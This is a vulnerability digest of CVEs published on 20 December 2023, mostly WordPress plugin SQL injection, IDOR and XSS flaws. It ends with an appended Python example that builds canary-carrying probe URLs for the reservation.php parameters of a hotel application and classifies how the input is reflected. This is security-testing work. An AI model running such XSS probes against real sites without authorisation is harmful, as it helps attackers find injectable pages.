Source : audit@patchstack.com
CVSS Score : 7.5

References :
https://patchstack.com/database/vulnerability/woocommerce-subscriptions/wordpress-woocommerce-subscriptions-plugin-5-1-2-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-35916

First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Authorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.

CVE ID : CVE-2023-35916
Source : audit@patchstack.com
CVSS Score : 7.5

References :
https://patchstack.com/database/vulnerability/woocommerce-payments/wordpress-woocommerce-payments-plugin-5-9-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-46147

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Deserialization of Untrusted Data vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5.

CVE ID : CVE-2023-46147
Source : audit@patchstack.com
CVSS Score : 7.4

References :
https://patchstack.com/database/vulnerability/themify-ultra/wordpress-themify-ultra-theme-7-3-3-authenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-47507

First published on : 20-12-2023 14:15:21
Last modified on : 20-12-2023 14:33:33

Description :
Deserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro. This issue affects Master Slider Pro: from n/a through 3.6.5.

CVE ID : CVE-2023-47507
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/masterslider/wordpress-master-slider-pro-plugin-3-6-5-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-26525

First published on : 20-12-2023 18:15:11
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy. This issue affects Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.12.

CVE ID : CVE-2023-26525
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/dokan-lite/wordpress-dokan-plugin-3-7-12-authenticated-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-28788

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress. This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 6.4.2.

CVE ID : CVE-2023-28788
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/advanced-page-visit-counter/wordpress-advanced-page-visit-counter-plugin-6-4-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Source : hq.dhs.gov

Vulnerability ID : CVE-2023-6689

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
A successful CSRF attack could force the user to perform state changing requests on the application. If the victim is an administrative account, a CSRF attack could compromise the entire web application.

CVE ID : CVE-2023-6689
Source : ics-cert@hq.dhs.gov
CVSS Score : 8.2

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-02 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-352


Source : ncsc.ch

Vulnerability ID : CVE-2023-0011

First published on : 20-12-2023 08:15:43
Last modified on : 20-12-2023 13:50:15

Description :
A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands. Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2, which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system-level files and hamper the availability of the module as well. This issue affects the TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280.

CVE ID : CVE-2023-0011
Source : vulnerability@ncsc.ch
CVSS Score : 7.6

References :
https://www.u-blox.com/en/report-security-issues | source : vulnerability@ncsc.ch

Vulnerability : CWE-20


Source : apache.org

Vulnerability ID : CVE-2023-37544

First published on : 20-12-2023 09:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions.

CVE ID : CVE-2023-37544
Source : security@apache.org
CVSS Score : 7.5

References :
http://www.openwall.com/lists/oss-security/2023/12/20/2 | source : security@apache.org
https://lists.apache.org/thread/od0k9zts1toc9h9snbqq4pjpyx28mv4m | source : security@apache.org

Vulnerability : CWE-287


Source : m-files.com

Vulnerability ID : CVE-2023-6912

First published on : 20-12-2023 10:15:08
Last modified on : 20-12-2023 13:50:15

Description :
Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.

CVE ID : CVE-2023-6912
Source : security@m-files.com
CVSS Score : 7.5

References :
https://www.m-files.com/about/trust-center/security-advisories/cve-2023-6912/ | source : security@m-files.com

Vulnerability : CWE-307


Source : google.com

Vulnerability ID : CVE-2023-6562

First published on : 20-12-2023 13:15:07
Last modified on : 20-12-2023 13:50:15

Description :
JPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially crafted image that is displayed back to the attacker.

CVE ID : CVE-2023-6562
Source : cve-coordination@google.com
CVSS Score : 7.5

References :
https://github.com/google/security-research/security/advisories/GHSA-g6qc-fhcq-vhf9 | source : cve-coordination@google.com

Vulnerability : CWE-22


Source : github.com

Vulnerability ID : CVE-2023-50249

First published on : 20-12-2023 14:15:21
Last modified on : 20-12-2023 14:33:33

Description :
Sentry-Javascript is the official set of Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry's Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0.

CVE ID : CVE-2023-50249
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/getsentry/sentry-javascript/commit/fe24eb5eefa9d27b14b2b6f9ebd1debca1c208fb | source : security-advisories@github.com
https://github.com/getsentry/sentry-javascript/pull/9815 | source : security-advisories@github.com
https://github.com/getsentry/sentry-javascript/security/advisories/GHSA-x3v3-8xg8-8v72 | source : security-advisories@github.com

Vulnerability : CWE-400


Vulnerability ID : CVE-2023-47118

First published on : 20-12-2023 17:15:08
Last modified on : 20-12-2023 19:52:41

Description :
ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of the T64 codec that crashes the ClickHouse server process. This attack does not require authentication. Note that this bug can also be triggered via the HTTP protocol; however, the attacker will need a valid credential, as HTTP authentication takes place first. This issue has been fixed in versions 23.10.2.13-stable, 23.9.4.11-stable, 23.8.6.16-lts and 23.3.16.7-lts.

CVE ID : CVE-2023-47118
Source : security-advisories@github.com
CVSS Score : 7.0

References :
https://github.com/ClickHouse/ClickHouse/security/advisories/GHSA-g22g-p6q2-x39v | source : security-advisories@github.com

Vulnerability : CWE-122


(36) MEDIUM VULNERABILITIES [4.0, 6.9]

Source : patchstack.com

Vulnerability ID : CVE-2023-28491

First published on : 20-12-2023 18:15:11
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tribulant Slideshow Gallery LITE. This issue affects Slideshow Gallery LITE: from n/a through 1.7.6.

CVE ID : CVE-2023-28491
Source : audit@patchstack.com
CVSS Score : 6.7

References :
https://patchstack.com/database/vulnerability/slideshow-gallery/wordpress-slideshow-gallery-lite-plugin-1-7-6-sql-injection?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-31092

First published on : 20-12-2023 16:15:07
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Foxskav Easy Bet. This issue affects Easy Bet: from n/a through 1.0.2.

CVE ID : CVE-2023-31092
Source : audit@patchstack.com
CVSS Score : 5.5

References :
https://patchstack.com/database/vulnerability/easy-bet/wordpress-easy-bet-plugin-1-0-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-32128

First published on : 20-12-2023 16:15:07
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Adastra Crypto Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free. This issue affects Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free: from n/a through 2.2.7.

CVE ID : CVE-2023-32128
Source : audit@patchstack.com
CVSS Score : 5.5

References :
https://patchstack.com/database/vulnerability/cryptocurrency-donation-box/wordpress-cryptocurrency-payment-donation-box-plugin-2-2-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2022-47599

First published on : 20-12-2023 18:15:11
Last modified on : 20-12-2023 19:52:41

Description :
Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager. This issue affects File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7.

CVE ID : CVE-2022-47599
Source : audit@patchstack.com
CVSS Score : 5.5

References :
https://patchstack.com/database/vulnerability/file-manager/wordpress-bit-file-manager-100-free-file-manager-for-wordpress-plugin-5-2-7-php-object-injection?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-38513

First published on : 20-12-2023 14:15:19
Last modified on : 20-12-2023 14:33:33

Description :
Authorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom). This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5.

CVE ID : CVE-2023-38513
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/wplr-sync/wordpress-photo-engine-plugin-6-2-5-insecure-direct-object-references-idor?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-36520

First published on : 20-12-2023 15:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Authorization Bypass Through User-Controlled Key vulnerability in MarketingFire Editorial Calendar. This issue affects Editorial Calendar: from n/a through 3.7.12.

CVE ID : CVE-2023-36520
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/editorial-calendar/wordpress-editorial-calendar-plugin-3-7-12-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-41796

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Authorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers. This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0.

CVE ID : CVE-2023-41796
Source : audit@patchstack.com
CVSS Score : 5.3

References :
https://patchstack.com/database/vulnerability/sunshine-photo-cart/wordpress-sunshine-photo-cart-plugin-2-9-25-order-manipulation-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2022-47597

First published on : 20-12-2023 18:15:11
Last modified on : 20-12-2023 19:52:41

Description :
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker – Popup for opt-ins, lead gen, & more. This issue affects Popup Maker – Popup for opt-ins, lead gen, & more: from n/a through 1.17.1.

CVE ID : CVE-2022-47597
Source : audit@patchstack.com
CVSS Score : 5.3

References :
https://patchstack.com/database/vulnerability/popup-maker/wordpress-popup-maker-plugin-1-17-1-unauth-access-to-debug-log?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-200


Source : us.ibm.com

Vulnerability ID : CVE-2023-47706

First published on : 20-12-2023 01:15:07
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341.

CVE ID : CVE-2023-47706
Source : psirt@us.ibm.com
CVSS Score : 6.6

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271341 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-35895

First published on : 20-12-2023 15:15:08
Last modified on : 20-12-2023 16:47:19

Description :
IBM Informix JDBC Driver 4.10 and 4.50 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 259116.

CVE ID : CVE-2023-35895
Source : psirt@us.ibm.com
CVSS Score : 6.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/259116 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7099762 | source : psirt@us.ibm.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2023-42012

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
An IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509.

CVE ID : CVE-2023-42012
Source : psirt@us.ibm.com
CVSS Score : 6.2

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/265509 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7096548 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47707

First published on : 20-12-2023 02:15:44
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271522.

CVE ID : CVE-2023-47707
Source : psirt@us.ibm.com
CVSS Score : 5.4

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271522 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-42013

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 265510.

CVE ID : CVE-2023-42013
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/265510 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7096547 | source : psirt@us.ibm.com

Vulnerability : CWE-209


Vulnerability ID : CVE-2023-47161

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799.

CVE ID : CVE-2023-47161
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/270799 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7096552 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47703

First published on : 20-12-2023 02:15:44
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 271197.

CVE ID : CVE-2023-47703
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271197 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-209


Vulnerability ID : CVE-2023-47702

First published on : 20-12-2023 02:15:43
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view or modify files on the system. IBM X-Force ID: 271196.

CVE ID : CVE-2023-47702
Source : psirt@us.ibm.com
CVSS Score : 4.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271196 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-47705

First published on : 20-12-2023 02:15:44
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to manipulate username data due to improper input validation. IBM X-Force ID: 271228.

CVE ID : CVE-2023-47705
Source : psirt@us.ibm.com
CVSS Score : 4.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271228 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47704

First published on : 20-12-2023 01:15:07
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 contains plain text hard-coded credentials or other secrets in source code repository. IBM X-Force ID: 271220.

CVE ID : CVE-2023-47704
Source : psirt@us.ibm.com
CVSS Score : 4.0

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271220 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-798


Source : incibe.es

Vulnerability ID : CVE-2023-6769

First published on : 20-12-2023 10:15:08
Last modified on : 20-12-2023 13:50:15

Description :
Stored XSS vulnerability in Amazing Little Poll, affecting versions 1.3 and 1.4. This vulnerability allows a remote attacker to store a malicious JavaScript payload in the "lp_admin.php" file in the "question" and "item" parameters. This vulnerability could lead to malicious JavaScript execution while the page is loading.

CVE ID : CVE-2023-6769
Source : cve-coordination@incibe.es
CVSS Score : 6.5

References :
https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amazing-little-poll | source : cve-coordination@incibe.es

Vulnerability : CWE-79


Source : m-files.com

Vulnerability ID : CVE-2023-6910

First published on : 20-12-2023 10:15:08
Last modified on : 20-12-2023 13:50:15

Description :
A vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. An authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests.

CVE ID : CVE-2023-6910
Source : security@m-files.com
CVSS Score : 6.5

References :
https://www.m-files.com/about/trust-center/security-advisories/cve-2023-6910 | source : security@m-files.com

Vulnerability : CWE-400


Source : microsoft.com

Vulnerability ID : CVE-2022-44684

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Windows Local Session Manager (LSM) Denial of Service Vulnerability

CVE ID : CVE-2022-44684
Source : secure@microsoft.com
CVSS Score : 6.5

References :
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-44684 | source : secure@microsoft.com


Source : hq.dhs.gov

Vulnerability ID : CVE-2023-50703

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
An attacker with network access could perform a man-in-the-middle (MitM) attack and capture sensitive information to gain unauthorized access to the application.

CVE ID : CVE-2023-50703
Source : ics-cert@hq.dhs.gov
CVSS Score : 6.3

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-03 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-319


Vulnerability ID : CVE-2023-50705

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
An attacker could create malicious requests to obtain sensitive information about the web server.

CVE ID : CVE-2023-50705
Source : ics-cert@hq.dhs.gov
CVSS Score : 5.3

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-03 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-200


Vulnerability ID : CVE-2023-50704

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
An attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users.

CVE ID : CVE-2023-50704
Source : ics-cert@hq.dhs.gov
CVSS Score : 4.3

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-03 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-601


Vulnerability ID : CVE-2023-50706

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
A user without administrator permissions with access to the UC500 Windows system could perform a memory dump of the running processes and extract clear-text credentials or valid session tokens.

CVE ID : CVE-2023-50706
Source : ics-cert@hq.dhs.gov
CVSS Score : 4.1

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-03 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-284


Source : adobe.com

Vulnerability ID : CVE-2023-51457

First published on : 20-12-2023 14:15:21
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-51457
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51458

First published on : 20-12-2023 14:15:21
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-51458
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51459

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-51459
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51460

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-51460
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51461

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-51461
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51462

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-51462
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Source : fluidattacks.com

Vulnerability ID : CVE-2023-49269

First published on : 20-12-2023 18:15:13
Last modified on : 20-12-2023 19:52:34

Description :
Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'adults' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.

CVE ID : CVE-2023-49269
Source : help@fluidattacks.com
CVSS Score : 5.4

References :
https://fluidattacks.com/advisories/lang/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49270

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_in_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.

CVE ID : CVE-2023-49270
Source : help@fluidattacks.com
CVSS Score : 5.4

References :
https://fluidattacks.com/advisories/lang/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49271

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_out_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.

CVE ID : CVE-2023-49271
Source : help@fluidattacks.com
CVSS Score : 5.4

References :
https://fluidattacks.com/advisories/lang/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49272

First published on : 20-12-2023 20:15:20
Last modified on : 20-12-2023 20:15:20

Description :
Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'children' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.

CVE ID : CVE-2023-49272
Source : help@fluidattacks.com
CVSS Score : 5.4

References :
https://fluidattacks.com/advisories/lang/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-79
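The four Hotel Management entries above report the same defect in reservation.php: a query parameter is echoed unencoded between HTML tags, so a crafted link executes script in the victim's browser. The block below is an added example, not code from the Hotel Management project or from the Fluid Attacks advisory. It builds a probe URL for each reported parameter and classifies a response body as raw reflection (exploitable), encoded reflection (what a correct fix produces) or no reflection. The host hotel.example, the benign filler values and the two sample response bodies are constructed for illustration.

```python
# Added example: reflection triage for the reservation.php parameters named in
# CVE-2023-49269 .. CVE-2023-49272. Not the application's own code.
import html
from urllib.parse import urlencode

RESERVATION_URL = "http://hotel.example/reservation.php"  # assumed host
PARAMS = ["adults", "check_in_date", "check_out_date", "children"]

# A canary with angle brackets: if they survive unencoded "between tags",
# the reflection context allows <script> injection.
CANARY = "<zx9q>"

# Benign filler so the other parameters look like a normal reservation.
BENIGN = {
    "adults": "2",
    "check_in_date": "2023-12-20",
    "check_out_date": "2023-12-21",
    "children": "0",
}


def build_probe_url(param: str, base: str = RESERVATION_URL) -> str:
    """URL that carries the canary in one parameter and benign values elsewhere."""
    if param not in PARAMS:
        raise ValueError(f"unknown reservation parameter {param!r}")
    query = dict(BENIGN)
    query[param] = CANARY
    return f"{base}?{urlencode(query)}"


def classify_reflection(body: str, canary: str = CANARY) -> str:
    """'raw' = canary echoed verbatim (exploitable), 'encoded' = HTML-escaped
    (the hardened behaviour), 'none' = parameter not reflected at all."""
    if canary in body:
        return "raw"
    if html.escape(canary) in body:  # "&lt;zx9q&gt;"
        return "encoded"
    return "none"


def triage(responses: dict) -> dict:
    """Map each parameter to its reflection class, given param -> response body."""
    return {param: classify_reflection(body) for param, body in responses.items()}


# Constructed response bodies standing in for what reservation.php would return
# before and after the fix; a real run would fetch build_probe_url(param).
VULNERABLE_RESPONSE = "<p>Adults: <zx9q></p>"
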